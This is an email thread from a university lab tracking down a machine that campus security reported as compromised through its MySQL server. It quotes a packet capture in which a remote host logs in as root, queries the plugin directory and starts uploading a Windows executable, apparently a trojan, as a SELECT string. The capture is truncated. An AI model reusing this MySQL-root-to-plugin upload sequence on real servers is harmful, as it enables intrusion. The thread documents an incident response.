<p dir="ltr">Ok we found it, it's the windows partition that Peter doesn't use. No idea how that happened since he told me his computer was running the Ubuntu partition at the time, but at least the mystery is solved. </p>
<div class="gmail_extra"><br><div class="gmail_quote">On 20 Jan 2017 15:16, "Adam Ibrahim" <<a href="mailto:adam.ibrahim.fr@gmail.com">adam.ibrahim.fr@gmail.com</a>> wrote:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><p dir="ltr">We found it ! IT'S PETER I'M WITH HIM RIGHT NOW I'M GOING TO PRETEND I DON'T KNOW ANY...</p>
<div class="gmail_extra"><br><div class="gmail_quote">On 20 Jan 2017 15:06, "Matthew Turk" <<a href="mailto:mturk@cs.ucsb.edu" target="_blank">mturk@cs.ucsb.edu</a>> wrote:<br type="attribution"><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex"><div lang="EN-US" link="blue" vlink="purple"><div class="m_4984286264770429436m_1796219740597547551WordSection1"><p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri",sans-serif;color:#1f497d">Thanks for checking. Scott said that the MAC address is 00:21:9b:05:e7:48 and it is a Dell computer. It seems to be currently off but was on Wednesday. It should also be a wired connection – unless we have a router in the trailer (do we?).<u></u><u></u></span></p><p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri",sans-serif;color:#1f497d"><u></u> <u></u></span></p><p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri",sans-serif;color:#1f497d"> Matthew<u></u><u></u></span></p><p class="MsoNormal"><span style="font-size:11.0pt;font-family:"Calibri",sans-serif;color:#1f497d"><u></u> <u></u></span></p><p class="MsoNormal"><b><span style="font-size:11.0pt;font-family:"Calibri",sans-serif">From:</span></b><span style="font-size:11.0pt;font-family:"Calibri",sans-serif"> Adam Ibrahim [mailto:<a href="mailto:adam.ibrahim.fr@gmail.com" target="_blank">adam.ibrahim.fr@gmail.<wbr>com</a>] <br><b>Sent:</b> Friday, January 20, 2017 3:00 PM<br><b>To:</b> Matthew Turk <<a href="mailto:mturk@cs.ucsb.edu" target="_blank">mturk@cs.ucsb.edu</a>><br><b>Cc:</b> <a href="mailto:ilab-users@lists.cs.ucsb.edu" target="_blank">ilab-users@lists.cs.ucsb.edu</a><br><b>Subject:</b> Re: [4eyes] [COE #74336] [UCSB-OIT #942765] <a href="http://128.111.28.118" target="_blank">128.111.28.118</a>: was compromised via its MySQL server<u></u><u></u></span></p><p class="MsoNormal"><u></u> <u></u></p><p>Hey Matthew, we checked all the machines that were on when it happened and couldn't find the culprit. There are a couple machines that have been turned off for a week (the ones Brandon and I tried salvaging) but they won't boot as there's no os and one's HDD looks dead. Do they know the mac address of the machine we're looking for ? None had that IP but IP can change and none was blocked from the network. If it weren't for the hp printer drivers I'd suspect someone out of the lab connected to our wifi. <br>Adam<u></u><u></u></p><div><p class="MsoNormal"><u></u> <u></u></p><div><p class="MsoNormal">On 20 Jan 2017 14:51, "Matthew Turk" <<a href="mailto:mturk@cs.ucsb.edu" target="_blank">mturk@cs.ucsb.edu</a>> wrote:<u></u><u></u></p><blockquote style="border:none;border-left:solid #cccccc 1.0pt;padding:0in 0in 0in 6.0pt;margin-left:4.8pt;margin-right:0in"><p class="MsoNormal">Update on this: Scott says the machine is in the trailer, and it's a Windows machine. So I need someone to please check the IP address of every Windows machine in the trailer - looking for 128.111.28.118. I expect there are orphaned machines that no one has checked.<br><br>Is anyone there this afternoon to do this ASAP?<br><br>Thanks,<br> Matthew<u></u><u></u></p><div><p class="MsoNormal"><br>-----Original Message-----<br>From: Matthew Turk [mailto:<a href="mailto:mturk21@gmail.com" target="_blank">mturk21@gmail.com</a>] On Behalf Of Matthew Turk<u></u><u></u></p></div><div><p class="MsoNormal">Sent: Thursday, January 19, 2017 5:59 PM<br>To: <a href="mailto:ilab-users@lists.cs.ucsb.edu" target="_blank">ilab-users@lists.cs.ucsb.edu</a><br>Subject: RE: [COE #74336] [UCSB-OIT #942765] <a href="http://128.111.28.118" target="_blank">128.111.28.118</a>: was compromised via its MySQL server<br><br>No one has claimed this machine yet. Please check yours and let me know. (There are usual suspects here, but I won't name names!)<br><br> Matthew<br><br>-----Original Message-----<br>From: Matthew Turk [mailto:<a href="mailto:mturk21@gmail.com" target="_blank">mturk21@gmail.com</a>] On Behalf Of Matthew Turk<br>Sent: Wednesday, January 18, 2017 9:20 PM<br>To: <a href="mailto:ilab-users@lists.cs.ucsb.edu" target="_blank">ilab-users@lists.cs.ucsb.edu</a><br>Subject: FW: [COE #74336] [UCSB-OIT #942765] <a href="http://128.111.28.118" target="_blank">128.111.28.118</a>: was compromised via its MySQL server<br><br>Whose machine is 128.111.28.118? Please check - if it's yours, please let me know and see the info below.<br><br>Thanks,<br> Matthew<br><br>-----Original Message-----<br>From: Tier II Support Issues via CoE Support [mailto:<a href="mailto:help@engineering.ucsb.edu" target="_blank">help@engineering.ucsb.<wbr>edu</a>]<br>Sent: Wednesday, January 18, 2017 10:41 AM<br>To: <a href="mailto:holl@cs.ucsb.edu" target="_blank">holl@cs.ucsb.edu</a>; <a href="mailto:mturk@cs.ucsb.edu" target="_blank">mturk@cs.ucsb.edu</a><br>Subject: [COE #74336] [UCSB-OIT #942765] <a href="http://128.111.28.118" target="_blank">128.111.28.118</a>: was compromised via its MySQL server<br><br>The following reply has been made regarding CoE Support ticket #74336:<br><br>Hi Matt and Tobias,<br><br>OIT has sent us this warning about ilab-118 machine that is compromised and needs to be looked into. Please read the information below.<br><br>On Wed Jan 18 10:24:26 2017, <a href="mailto:security@ucsb.edu" target="_blank">security@ucsb.edu</a> wrote:<br>> Greetings,<br>><br>> 128.111.28.118 has been compromised and has been blocked. The host was<br>> compromised via its MySQL server.<br>><br>> Before correcting any problems, please consider whether any sensitive<br>> personal information is stored on this device. If this device contains<br>> personal information and if it appears to have been compromised,<br>> please contact the UCSB Chief Information Security Officer, at<br>> <a href="mailto:CISO@oist.ucsb.edu" target="_blank">CISO@oist.ucsb.edu</a> or 893-5005 immediately.<br>><br>> To view the UCSB procedures when a device storing personal information<br>> has been compromised, please visit:<br>> <a href="http://www.ets.ucsb.edu/security/sb-1386-and-ab-1298-guideline" target="_blank">http://www.ets.ucsb.edu/securi<wbr>ty/sb-1386-and-ab-1298-guideli<wbr>ne</a><br>><br>> Please investigate and advise. Here is a sample of traffic from the<br>> trojan:<br>><br>> ----------sample----------<br>> T 2017/01/18 02:45:47.091988 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:47.497391 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>> J...<br>> 5.5.11..+..EV``AdUY...!.......<wbr>........B~tMc*DXpHVW.mysql_nat<wbr>ive_password.<br>><br>> T 2017/01/18 02:45:47.684113 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>><br><a href="mailto:V..........@........................root......Ndy....3......;.mysql.mysql_native_password" target="_blank">V..........@..................<wbr>......root......Ndy....3......<wbr>;.mysql.mysql_native_password</a>.<br>><br>> T 2017/01/18 02:45:47.684972 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>> ...........<br>><br>> T 2017/01/18 02:45:47.878832 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>> .....SELECT @@max_allowed_packet;<br>><br>> T 2017/01/18 02:45:47.899132 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>><br>.....*....def....@@max_allowed<wbr>_packet..?....................<wbr>.....1048576.........<br>><br>> T 2017/01/18 02:45:48.088029 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>> .....SHOW VARIABLES LIKE 'VERS%';<br>><br>> T 2017/01/18 02:45:48.287569 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:48.331489 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>><br><a href="mailto:.....T....def.information_schema.VARIABLES.VARIABLES.Variable_name.VARIABLE_NAME...@.........M....def.information_schema.VARIABLES.VARIABLES.Value.VARIABLE_VALUE....................%22......version.5.5.11-" target="_blank">.....T....def.information_sche<wbr>ma.VARIABLES.VARIABLES.Variabl<wbr>e_name.VARIABLE_NAME...@......<wbr>...M....def.information_<wbr>schema.VARIABLES.VARIABLES.<wbr>Value.VARIABLE_VALUE..........<wbr>.........."......version.5.5.<wbr>11-</a><br>> ....version_comment.MySQL Community Server<br>> (GPL).....version_compile_mach<wbr>ine.x86.....version_compile_<wbr>os.Win64.......".<br>><br>> T 2017/01/18 02:45:48.682703 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>> ......<br>><br>> T 2017/01/18 02:45:50.427705 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>><br>> ....USE MYSQL<br>><br>> T 2017/01/18 02:45:50.428403 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>> ...........<br>><br>> T 2017/01/18 02:45:50.613848 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>> .....SELECT @@version_compile_os;<br>><br>> T 2017/01/18 02:45:50.614481 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>><br>.....*....def....@@version_com<wbr>pile_os.......................<wbr>.....Win64.........<br>><br>> T 2017/01/18 02:45:50.800022 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>> .....SELECT @@plugin_dir;<br>><br>> T 2017/01/18 02:45:50.800759 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> [AP]<br>> ....."....def....@@plugin_dir.<wbr>...2..................3...2C:\<wbr>Program<br>> Files\MySQL\MySQL Server 5.5\lib/plugin.........<br>><br>> T 2017/01/18 02:45:50.990204 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>> .l...SELECT<br>><br>'MZ.\0.\0\0\0.\0\0\0..\0\0.\0\<wbr>0\0\0\0\0\0@\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0.\0\0\0.<wbr>...\0...!..L.!This<br>> program cannot be run in DOS<br>><br>mode.\r\r\n$\0\0\0\0\0\0\0....<wbr>[...[...[...R.\".G...R.%.3...R<wbr>.5.\\...[...1...R.3.P...R./.Z.<wbr>..R.4.Z...R.7.Z...Rich[...\0\<wbr>0\0\0\0\0\0\0PE\0\0d..\0?..M\<wbr>0\0\0\0\0\0\0\0.\0\"<br>><br>...\0\0.\0\0\0V\0\0\0\0\0\0D.\<wbr>0\0\0.\0\0\0\0\0..\0\0\0\0.\0\<wbr>0\0.\0\0.\0.\0\0\0\0\0.\0.\0\0<wbr>\0\0\0\0..\0\0.\0\0...\0.\0\0\<wbr>0\0\0.\0\0\0\0\0\0.\0\0\0\0\0\<wbr>0\0\0.\0\0\0\0\0\0.\0\0\0\0\0\<wbr>0\0\0\0\0.\0\0\0...\0..\0\0...<wbr>\0P\0\0\0\0`.\0..\0\0\0P.\0..\<wbr>0\0\0\0\0\0\0\0\0\0\0p.\0..\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0.\0\0..\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0.text\0\0\0p.\0\0\0.\<wbr>0\0\0.\0\0\0.\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0<br>><br>\0\0`.rdata\0\0..\0\0\0.\0\0\0<wbr>0\0\0\0.\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0@\0\0@.data\0\0\0.5\0\0\<wbr>0..\0\0.\0\0\0.\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0@\0\0..pdata\0\0!<br>><br>..\0\0\0P.\0\0\n\0\0\0..\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0@\0\0@.rsr<wbr>c\0\0\0..\0\0\0`.\0\0.\0\0\0..<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0@\0\<wbr>0@.reloc\0\0..\0\0\0p.\0\0.\0\<wbr>0\0..\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0@\0\0B\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\<wbr>0\0\0\0\0\0\0\0\0\0\0<br>><br>> T 2017/01/18 02:45:50.990462 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>><br>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0<wbr>\0\0\0\0.:\0tPH..D.\0\0I.\0H..<wbr>B.\0\0I.@.H..?.\0\0I.@.H..<.\0<wbr>\0I.@.H..9.\0\0I.@<br>><br>H..6.\0\0I.@(...3.\0\0fA.@0...<wbr>2..........H..!.\0\0I.\0H....\<wbr>0\0I.@.H....\0\0I.@...\Z.\0\0A<wbr>.@......\0\0fA.@......\0\0A.@.<wbr>A...\0\0\0I........:.u.H.B..8\<wbr>0u....2..H....\0\0I.\0H....\0\<wbr>0I.@.H....\0\0I.@.H....\0\0I.@<wbr>.H....\0\0I.@<br>> .....\0\0fA.@(.....\0\0A.@*...<wbr>.............\0\0.............<wbr>@SH..<br>> H.J.I..H.....\0\0L..H..u.H.L$P<wbr>...H..<br>> [.H.|$03.H...I....H.|$0I..H..H<wbr>....H.. [................H.\\$.WH..<br>><br>.:.I..H..tUH.\rT...H....\0\0I.<wbr>\0H....\0\0I.@.H....\0\0I.@...<wbr>..\0\0A.@......\0\0fA.@......\<wbr>0\0A.@...H.\\$0H..<br>><br>_.H.B..8\0tJH.\r....H....\0\0I<wbr>.\0H..\0.\0\0I.@.H....\0\0I.@.<wbr>H....\0\0I.@.H....\0\0I.@<br>> ..H.\\$0H.. <a href="mailto:_..@.%5C0%5C0%5C" target="_blank">_..@.\0\0\</a>!<br>> 0\0H.B..H..\0.L.....\0\0H.G.H.<wbr>.u?H.\r....H..<br>> .\0\0H..H..(.\0\0H.C.H..0.\0\0<wbr>H.C....8.\0\0f.C...H.\\$0H..<br>> _.2.H.\\$0H..<br>> _......H..(H.I.H..t..^.\0\0H..<wbr>(..........H.\\$.H.t$.WH..<br>><br>H.B.H.q.H..H.R.D.\0H..H..I.\\0<wbr>....\0\0L._.H..A....0\0H.G.H.W<wbr>.D.@.H.R..\\.\0\0L._.H..A.C.H.<wbr>....\0....\0\0H.\\$0H.t$8H.H..<br>><br>_...H..(H.J.H.....\0\0H.H..(..<wbr>.........:.u.H.B..8\0u.2..H...<wbr>.\0\0I.\0H....\0\0I.@.H....\0\<wbr>0I.@.H....\0\0I.@.H....\0\0I.@<br>> .....\0\0fA.@(.....\0\0A.@*...<wbr>...............H.t$ WATA<br>><br>> T 2017/01/18 02:45:50.990557 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>> VH.. .\0.\0\0H.l$HM..L.l$PH...`.\0\<wbr>0..\0\0\0L...S.\0\0E3.H..\r.\0<wbr>\0D.<br>><br>H.O.H..H.....\0\0A.T$.I..L..H.<wbr>..p.\0\0H..tYH.\\$@f.H...3.I..<wbr>..H..B.\\!.H.y.H.....#.\0\0A..<wbr>D..H..I..H.....\0\0L....\0\0\0<wbr>I..D.....\0\0H..u.H.\\$@H....\<wbr>r\0\0.>\0L.l$PH.l$Ht/H...A.D$.<wbr>H....0\03...H..H..H..A..H.t$XH<wbr>..<br>> A^A\\_.H.D$`.\0.H..H.t$XH..<br>><br>A^A\\_...............H.\\$.H.t<wbr>$.WH..0H.z.H...3.H.?H..D.H@..A<wbr>.\0.\0\0H..H..H.y.3.....\0\0H.<wbr>V.L..H..H..H.....\0\0H.T$HL..<wbr>B\0\0\0H.T$(L..3.3..D$<br>><br>\0\0\0\0....\0\0...H......\0\0<wbr>H.\\$@H.t$P3.H..0_...........H<wbr>..(.\'.\0\0.\03.H..(<a href="mailto:...............@UVATH....%5C0%5C0H..%5Cr.%5C0%5C0H3.H..$..%5C0%5C0H.....H.L$xD.EaE3.3.D.d$p.d(%5C0%5C03.H.D$XH.D$%60L.d$PH......%5C0%5C0H..$..%5C0%5C0H..$..%5C0%5C0L..$..%5C0%5C0A..%5C0%5C0%5C0H..$.%5C0%5C0%5C0A....k.%5C0%5C0.%5e...%3eH.....%5C0%5C0.U.D.E.E3.A..D.d$(D.d$" target="_blank">..........<wbr>.....@UVATH....\0\0H..\r.\0\0H<wbr>3.H..$..\0\0H.....H.L$xD.EaE3.<wbr>3.D.d$p.d(\0\03.H.D$XH.D$`L.d$<wbr>PH......\0\0H..$..\0\0H..$..\<wbr>0\0L..$..\0\0A..\0\0\0H..$.\0\<wbr>0\0A....k.\0\0.^...>H.....\0\<wbr>0.U.D.E.E3.A..D.d$(D.d$</a><br>><br>..h.\0\0...H..3.H..$.\0\0\0fD.<wbr>.$.\0\0\0..$.\0\0\0H..$.\0\0\0<wbr>..\".\0\0D.E.H..$.\0\0\0H..f..<wbr>$.\0\0\0....\0\0H..$..\0\0H..$<wbr>..\0\0.....\0\0\0H.L$p..:.\0\0<wbr>H..$..\0\0H.\r3.\0\0A...\0\0.D<wbr>$ph\0\0\0..$.\0\0\0..\0\0fD..$<wbr>.\0\0\0H..$.\0\0\0H..$.\0\0\0H<wbr>..$.!<br>><br>\0\0\0....\0\0....x\0\0\0H.D$P<wbr>H..$..\0\0E3.H.D$HH.D$pE3.H.D$<wbr>@L.d$8L.d$03..D$(.\0\0\0.D$<br>><br>.\0\0\0....\0\0..t0A..H.L$P...<wbr>\0\0....\0\0=..\0\0t.H.L$P..~.<wbr>\0\0H.L$X..s.\0\0A..H......\0\<wbr>0H......\0\0L..$..\0\0..H..$..<wbr>\0\0H3....\0\0H....\0\0A\\^]..<wbr>........:.u.H.B..8\0u..x.\0u.2<wbr>..H..\Z.\0\0I.\0H....\0\0I.@.H<wbr>....\0\0I.@.H....\0\0I.@.H....<wbr>\0\0I.@<br>><br>.....\0\0fA.@(.......H.\\$.WH.<wbr>.0..\0\0\0H....\n\0\0H..H..tUH<wbr>.O.H....<.\0\0.C.H.O.H.I....\<wbr>0\0L..-<br>> ...L..f..3.3.H.D$(3..D$ ..z.\0\0H....i.<br>><br>> T 2017/01/18 02:45:50.990690 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>><br>\0\03.H.\\$@H..0_.H..\0\0\0\0\<wbr>0\0\0H.\\$@H..0_........2.....<wbr>..........H.\\$.WH..PH.D$0....<wbr>3..D$8.\0\0\0.D$D.\0\0\0..5.\0<wbr>\0L.D$0.W(H......\0\0.....\0\0<wbr>\0L.D$<H....\0\03.....\0\0....<wbr>tHH.L$0L.D$8E3.3.H.|$(H.|$<br>> ....\0\0....t#D.O.E3.3.3..D$<br>><br>.\0\0\0..d.\0\0....t.\0\0..H.L<wbr>$0....\0\0..[.\0\0t...t\r3.H.\<wbr>\$`H..P_.H..\0\0\0\0\0\0\0H.\\<wbr>$`H..P_..UH..H.E..............<wbr>.ff...\0\0\0\0\0H;\r..\0\0u.H.<wbr>..f....u...H....U.\0\0.H..t7SH<wbr>..<br>> L..H.\r...\03...L.\0\0..u....\<wbr>0\0H......\0\0...k.\0\0..H..<br>><br>[....H..(L...\n.\0D...\n.\0M..<wbr>I..I...M..M;.s.H9\nt.H...I;.r.<wbr>I;.s.H...VH..uOA.@.A;.rF..H...<wbr>......H;.s5D.A.I...e.\0\0L..H.<wbr>.t!.\r[\n.\0H..\\\n.\0H..H...I<wbr>.....\rB\n.\0..3.H..(..H..H.X.<wbr>H.H.VWATAUAVH..0.\0\0L..3.L..<wbr>H.\\$h.X..X..X\Z.\\$`..H;....;<wbr>.u&...\0\0.\0.\0\0\0H.\\$<br>> E3.E3.3.3....\0\03....\0\0..H;<wbr>....;.u&...\0\0.\0.\0\0\0H.\\$<br>> E3.E3.3.3....\0\03....\0\0.<br>> 8\nu...\0\0\0H..8\nt.....\0\0\<wbr>0..<wt*<rt&.P.\0\0.\0.\0\0\0H.<wbr>\\$<br>><br>E3.E3.3.3..Z.\0\03....\0\0..$p<wbr>.\0\0H..8\nu.H..8\nt...:.t.<tt<wbr>*<bt&...\0\0.\0.\0\0\0H.\\$<br>> E3.E3!<br>><br>.3.3....\0\03..:.\0\0..$q.\0\0<wbr><tu.A.\0@\0\0..D...\0.\0\0<bD.<wbr>D.A.....\0.\0\0H.L$X..*\0\0...<wbr>....\0\0..$p.\0\0wu...D....$x.<wbr>\0\0.t$P....D....$x.\0\0.\\$P.<wbr>.\0\0\0..\Z\0\0;.u..L$X.Y)\0\<wbr>0.L$\\.P)\0\03....\0\0..\0\0\<wbr>0...\0\0..t$t.t$p....\0\0Ic.Hc<wbr>L.XH..H...L...&.\0...Hk.XI....<wbr>D$0.\0\0\0.t$(.d$<br>><br>\0L..$.\0\0\0L..H..\nH....z.\0<wbr>\0......\0\0.L.X..(\0\0.d.p\0H<wbr>cD$PH..$p.\0\0.L.X.\Z\"\0\0L..<wbr>H..$.\0\0\0H......\0\03......<wbr>H..$.\0\0\0H......\0\0L....\0\<wbr>03.H.L$h.+\r\0\0....t\Z...u.H.<wbr>d$<br>> \0E<br>><br>> T 2017/01/18 02:45:50.990877 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [A]<br>> 3.E3.3.3..c.\0\0..u\nL.l$hM..u<wbr>.L.-..\0\0.h\0\0\0L..3.H..$.\0<wbr>\0\0..<br>><br>\0\0..$.\0\0\0..$.\0\0\0\0.\0\<wbr>0..u.H..$.\0\0\0H..H.\r.%.\0..<wbr>H.\r.%.\0H..H..$.\0\0\0H..$..\<wbr>0\0;.t.H.AXH..$..\0\0H...\0\0\<wbr>0H..$<br>><br>.\0\0I...x.\0\0H..I...m.\0\0H.<wbr>.H.\r..\0\0.^.\0\0H.\\..H..H..<wbr>...\0\0L..3.H;.....\0\0M..H..H<wbr>.....\0\0;.t.H.|$<br>> E3.E3.3.3..n.\0\0L....\0\0H..I<wbr>.....\0\0;.t.H.|$<br>> E3.E3.3.3..D.\0\0L..$`.\0\0H..<wbr>I.....\0\0;.t.H.|$<br>><br>E3.E3.3.3....\0\0...\0\0....$`<wbr>.\0\03.I...\r.\0\0;.uEH..$.\0\<wbr>0\0H.D$HH..$.\0\0\0H.D$@H.|$8H<wbr>.|$0.|$(.t$<br>> E3.E3.I..I......\0\0...D.\0\0H<wbr>.|$xH.....\0\0...\0\0H..H..u-<br>><br>3......I.......H.L$h........\0<wbr>\0..D..$x.\0\0.l.\0\0L....\0\0<wbr>3.H.L$x...\0\0....t\Z...u.H.d$<br>><br>\0E3.E3.3.3..>.\0\0..t?H.L$x.L<wbr>...H...D...I...<...H.L$h.2....<wbr>..\0\0..$`.\0\0..D..$x.\0\0...<wbr>\0\0H.L$x3.A...\0\0H...6.\0\0H<wbr>..$.\0\0\0H;...<.\0\08.....\0\<wbr>0H...q.\0\0H.\\8..;\\uA.\\\0\<wbr>0\0H....\Z\0\0H;.taL....\0\0..<wbr>.\0\0H...1.\0\0..tIH.d$<br>> \0E3.E3.3.3..|.\0\0.2.;/t-L...<wbr>.\0\0...\0\0H.....\0\0..t.H.d$<br>> \0E3.E3.3.3..H.\0\0I.....\0\0H<wbr>..H.....\0\0H..!<br>> ...\0\0H;....\0\0\0M..H..H....<wbr>.\0\03.;.t.H.\\$<br>><br>E3.E3.3.3....\0\03.H....\Z\0\0<wbr>;.uBH..$.\0\0\0H.D$HH..$.\0\0\<wbr>0H.D$@H.\\$8H.\\$0.\\$(.t$<br>><br>E3.E3.I..H......\0\0....H..$.\<wbr>0\0\0......t$`.\n.t$`...t$`H.L<wbr>$x.....H.........$`.\0\03.I...<wbr>....H.L$h.~...H..$.\0\0\0....\<wbr>0\0H..$.\0\0\0..r.\0\0.E.\0\0.<wbr>.;.t.H..$.\0\0\0H..$.\0\0\0H.<wbr>A.L.1.mH..$.\0\0\0H.9D..$x.\0\<wbr>0..D..$x.\0\0I...1.\0\0Hc|$P.<wbr>d.p\0E3.L..$.\0\0\0.\n.|$P...|<wbr>$PIc..|.p\0t..L.X..#\0\0Hc..|.<wbr>p\0t\n.L.X..#\0\0...\0\0\0...\<wbr>0\0I..H..<br>><br>> T 2017/01/18 02:45:50.990879 <a href="http://188.132.176.26:3549" target="_blank">188.132.176.26:3549</a> -><br>> <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> [AP]<br>><br>$h.\0\0H..0.\0\0A^A]A\\_^.H.t$<wbr>.H.|$.ATH..0L..H...3.H.......u<wbr>\'.l\r\0\0.\0.\0\0\0H.d$<br>><br>\0E3.E3.3.3..u.\0\0....\0\0\0.<wbr>.\0\0\0...\0\0..u.....\0\0\0..<wbr>\0\0\0...\0\0.I...z...H..H..u\<wbr>r..\r\0\0.\0.\0\0\0.PI...5.\0\<wbr>0.\0\r\0\0D.<br>> ...\0\0.<br>> \0A..\0\0\0H.V.H.L$@.9\'\0\0H;<wbr>.u\n...\0\0.8.u..|$@...\0\0D.<br>> H.&\0H.f.\0..\0\0\0...\0\0..H.<wbr>t$HH.|$PH..0A\\.H.\\$.H.t$.WH.<wbr>.<br>> H..H...w|..\0\0\0H..H.E.H.\r=.<wbr>.\0H..u .k-<br>><br>\0\0..\0\0\0.9+\0\0..\0\0\0..\<wbr>'\0\0H.\r...\0L..3.....\0\0H..<wbr>H..u,9....\0t.H...y-<br>> \0\0..t\r...\".\0\0.\0.\0\0\0.<wbr>..\0\0.\0.\0\0\0H.....S-<br>> \0\0...\0\0.\0.\0\0\03.H.\\$0H<wbr>.t$8H..<br>><br>_...3.D.B\n../\0\0.H.\\$.WH..P<wbr>H..L....\0\0H.L$`3.3.H.\\$`.Y.<wbr>\0\0;.t....u.E3.E3.3.3.H.\\$<br>><br>...\0\0H.L$`H.L$0H;.u\ZH;....\<wbr>0\0\03....\0\0;......\0\0\0H..<wbr>..\0\0H.|$@H.\\$HH.D$8H;.tM.O.<wbr>\0\0.8.H.\0\0L.D$0..H.T$0E3.3.<wbr>..3\0\0.....t..&.\0\0.8.8...\0<wbr>\0.8.t\n...\0\0.8\ru$...\0\0.8<wbr>H..p.\0\0L.D$0E3.3.H.T$0.<br>> /\0\0..H.L$`.......H.\\$hH..P_<wbr>.....<br>><br>> T 2017/01/18 02:45:50.991064 <a href="http://128.111.28.118:3306" target="_blank">128.111.28.118:3306</a> -><br>> <a href="http://188.132.176.26:3549" 